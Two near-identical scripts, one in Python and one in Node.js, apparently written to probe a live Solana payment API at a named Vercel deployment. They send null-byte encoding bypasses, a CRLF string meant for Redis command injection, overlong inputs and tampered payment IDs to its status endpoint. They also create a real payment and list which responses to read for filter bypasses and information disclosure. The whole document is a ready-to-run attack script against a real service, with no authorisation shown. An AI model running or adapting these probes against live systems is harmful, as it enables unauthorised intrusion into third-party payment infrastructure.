File: test_encoding_bypass.py
import requests
import json
from urllib.parse import quote

BASE_URL = "https://solana-blik.vercel.app"

def test_payload(payload_name, payload, description=""):
    """Test a single payload against the status endpoint"""
    url = f"{BASE_URL}/api/payments/{payload}/status"
    
    print(f"\n{"="*80}")
    print(f"Test: {payload_name}")
    print(f"Payload: {repr(payload)}")
    if description:
        print(f"Description: {description}")
    print(f"URL: {url}")
    
    try:
        response = requests.get(url, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Content-Type: {response.headers.get("content-type", "N/A")}")
        
        # Try to parse as JSON
        try:
            json_response = response.json()
            print(f"Response: {json.dumps(json_response, indent=2)[:500]}")
        except:
            # If not JSON, show raw text
            print(f"Response (text): {response.text[:500]}")
            
        return response
    except Exception as e:
        print(f"Error: {str(e)}")
        return None

def create_payment():
    """Try to create a real payment and get a valid payment ID"""
    url = f"{BASE_URL}/api/payments/create"
    
    print(f"\n{"="*80}")
    print(f"Creating Test Payment")
    print(f"URL: {url}")
    
    payload = {
        "amount": 0.01,
        "merchantWallet": "11111111111111111111111111111111"
    }
    
    print(f"Payload: {json.dumps(payload, indent=2)}")
    
    try:
        response = requests.post(url, json=payload, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Content-Type: {response.headers.get("content-type", "N/A")}")
        
        try:
            json_response = response.json()
            print(f"Response: {json.dumps(json_response, indent=2)}")
            return json_response.get("paymentId")
        except:
            print(f"Response (text): {response.text}")
            return None
    except Exception as e:
        print(f"Error: {str(e)}")
        return None

def main():
    print("="*80)
    print("ENCODING BYPASS TESTING - Payment Status Endpoint")
    print("="*80)
    
    # Test 1: Valid UUID format (baseline)
    test_payload(
        "Valid UUID",
        "550e8400-e29b-41d4-a716-446655440000",
        "Baseline test with valid UUID format"
    )
    
    # Test 2: Double URL encoding (null byte)
    test_payload(
        "Double URL Encoded Null",
        "test%2500",
        "Attempting to bypass filters with double-encoded null byte"
    )
    
    # Test 3: Unicode null byte
    test_payload(
        "Unicode Null",
        "test\\u0000",
        "Unicode representation of null byte"
    )
    
    # Test 4: Case variation
    test_payload(
        "Case Variation",
        "PAYMENT:TEST",
        "Testing case sensitivity in validation"
    )
    
    # Test 5: Length boundary
    long_payload = "A" * 500
    test_payload(
        "Length Boundary",
        long_payload,
        f"Testing with very long string ({len(long_payload)} chars)"
    )
    
    # Test 6: Redis CRLF injection
    test_payload(
        "CRLF Injection",
        "test\\r\\nGET",
        "Attempting Redis command injection via CRLF"
    )
    
    # Additional encoding tests
    test_payload(
        "Raw Null Byte Attempt",
        "test\x00bypass",
        "Direct null byte in string"
    )
    
    test_payload(
        "URL Encoded Null",
        "test%00bypass",
        "Single URL-encoded null byte"
    )
    
    test_payload(
        "Hex Encoded",
        "test\\x00bypass",
        "Hex escape sequence"
    )
    
    # Test creating a real payment
    print(f"\n{"="*80}")
    print("ATTEMPTING TO CREATE REAL PAYMENT")
    print("="*80)
    
    payment_id = create_payment()
    
    if payment_id:
        print(f"\n{"="*80}")
        print(f"Testing with Valid Payment ID: {payment_id}")
        print("="*80)
        
        test_payload(
            "Valid Payment ID",
            payment_id,
            "Testing status check with legitimate payment ID"
        )
        
        # Test manipulation of valid payment ID
        if len(payment_id) > 5:
            test_payload(
                "Modified Payment ID",
                payment_id[:-1] + "X",
                "Testing with slightly modified valid payment ID"
            )
    
    print(f"\n{"="*80}")
    print("TESTING COMPLETE")
    print("="*80)
    print("\nSummary:")
    print("- Tested various encoding bypass techniques")
    print("- Attempted null byte injection via multiple encodings")
    print("- Tested CRLF injection for Redis command injection")
    print("- Tested case variations and length boundaries")
    print("- Attempted to create and test with valid payment IDs")
    print("\nAnalyze responses above for:")
    print("  1. Differences in error handling")
    print("  2. Any successful bypasses of null byte filter")
    print("  3. Information disclosure in error messages")
    print("  4. Patterns in valid payment ID structure")

if __name__ == "__main__":
    main()

File: test_encoding_bypass.mjs
import https from "https";
import http from "http";

const BASE_URL = "https://solana-blik.vercel.app";

function makeRequest(path, method = "GET", body = null) {
    return new Promise((resolve, reject) => {
        const url = new URL(path, BASE_URL);
        
        const options = {
            hostname: url.hostname,
            port: url.port || 443,
            path: url.pathname + url.search,
            method: method,
            headers: {
                "Content-Type": "application/json",
                "User-Agent": "SecurityTester/1.0"
            }
        };
        
        if (body) {
            const bodyStr = JSON.stringify(body);
            options.headers["Content-Length"] = Buffer.byteLength(bodyStr);
        }
        
        const protocol = url.protocol === "https:" ? https : http;
        
        const req = protocol.request(options, (res) => {
            let data = "";
            
            res.on("data", (chunk) => {
                data += chunk;
            });
            
            res.on("end", () => {
                resolve({
                    statusCode: res.statusCode,
                    headers: res.headers,
                    body: data
                });
            });
        });
        
        req.on("error", (error) => {
            reject(error);
        });
        
        if (body) {
            req.write(JSON.stringify(body));
        }
        
        req.end();
    });
}

async function testPayload(payloadName, payload, description = "") {
    console.log("\n" + "=".repeat(80));
    console.log(`Test: ${payloadName}`);
    console.log(`Payload: ${JSON.stringify(payload)}`);
    if (description) {
        console.log(`Description: ${description}`);
    }
    
    const path = `/api/payments/${payload}/status`;
    console.log(`URL: ${BASE_URL}${path}`);
    
    try {
        const response = await makeRequest(path);
        console.log(`Status Code: ${response.statusCode}`);
        console.log(`Content-Type: ${response.headers["content-type"] || "N/A"}`);
        
        try {
            const jsonResponse = JSON.parse(response.body);
            console.log(`Response: ${JSON.stringify(jsonResponse, null, 2).substring(0, 500)}`);
        } catch {
            console.log(`Response (text): ${response.body.substring(0, 500)}`);
        }
        
        return response;
    } catch (error) {
        console.log(`Error: ${error.message}`);
        return null;
    }
}

async function createPayment() {
    console.log("\n" + "=".repeat(80));
    console.log("Creating Test Payment");
    const path = "/api/payments/create";
    console.log(`URL: ${BASE_URL}${path}`);
    
    const payload = {
        amount: 0.01,
        merchantWallet: "11111111111111111111111111111111"
    };
    
    console.log(`Payload: ${JSON.stringify(payload, null, 2)}`);
    
    try {
        const response = await makeRequest(path, "POST", payload);
        console.log(`Status Code: ${response.statusCode}`);
        console.log(`Content-Type: ${response.headers["content-type"] || "N/A"}`);
        
        try {
            const jsonResponse = JSON.parse(response.body);
            console.log(`Response: ${JSON.stringify(jsonResponse, null, 2)}`);
            return jsonResponse.paymentId;
        } catch {
            console.log(`Response (text): ${response.body}`);
            return null;
        }
    } catch (error) {
        console.log(`Error: ${error.message}`);
        return null;
    }
}

async function main() {
    console.log("=".repeat(80));
    console.log("ENCODING BYPASS TESTING - Payment Status Endpoint");
    console.log("=".repeat(80));
    
    // Test 1: Valid UUID format (baseline)
    await testPayload(
        "Valid UUID",
        "550e8400-e29b-41d4-a716-446655440000",
        "Baseline test with valid UUID format"
    );
    
    // Test 2: Double URL encoding (null byte)
    await testPayload(
        "Double URL Encoded Null",
        "test%2500",
        "Attempting to bypass filters with double-encoded null byte"
    );
    
    // Test 3: Unicode null byte
    await testPayload(
        "Unicode Null",
        "test\\\\u0000",
        "Unicode representation of null byte"
    );
    
    // Test 4: Case variation
    await testPayload(
        "Case Variation",
        "PAYMENT:TEST",
        "Testing case sensitivity in validation"
    );
    
    // Test 5: Length boundary
    const longPayload = "A".repeat(500);
    await testPayload(
        "Length Boundary",
        longPayload,
        `Testing with very long string (${longPayload.length} chars)`
    );
    
    // Test 6: Redis CRLF injection
    await testPayload(
        "CRLF Injection",
        "test\\\\r\\\\nGET",
        "Attempting Redis command injection via CRLF"
    );
    
    // Additional encoding tests
    await testPayload(
        "Raw Null Byte Attempt",
        "test\\x00bypass",
        "Direct null byte in string"
    );
    
    await testPayload(
        "URL Encoded Null",
        "test%00bypass",
        "Single URL-encoded null byte"
    );
    
    await testPayload(
        "Hex Encoded",
        "test\\\\x00bypass",
        "Hex escape sequence"
    );
    
    // Test creating a real payment
    console.log("\n" + "=".repeat(80));
    console.log("ATTEMPTING TO CREATE REAL PAYMENT");
    console.log("=".repeat(80));
    
    const paymentId = await createPayment();
    
    if (paymentId) {
        console.log("\n" + "=".repeat(80));
        console.log(`Testing with Valid Payment ID: ${paymentId}`);
        console.log("=".repeat(80));
        
        await testPayload(
            "Valid Payment ID",
            paymentId,
            "Testing status check with legitimate payment ID"
        );
        
        // Test manipulation of valid payment ID
        if (paymentId.length > 5) {
            await testPayload(
                "Modified Payment ID",
                paymentId.slice(0, -1) + "X",
                "Testing with slightly modified valid payment ID"
            );
        }
    }
    
    console.log("\n" + "=".repeat(80));
    console.log("TESTING COMPLETE");
    console.log("=".repeat(80));
    console.log("\nSummary:");
    console.log("- Tested various encoding bypass techniques");
    console.log("- Attempted null byte injection via multiple encodings");
    console.log("- Tested CRLF injection for Redis command injection");
    console.log("- Tested case variations and length boundaries");
    console.log("- Attempted to create and test with valid payment IDs");
    console.log("\nAnalyze responses above for:");
    console.log("  1. Differences in error handling");
    console.log("  2. Any successful bypasses of null byte filter");
    console.log("  3. Information disclosure in error messages");
    console.log("  4. Patterns in valid payment ID structure");
}

main().catch(console.error);
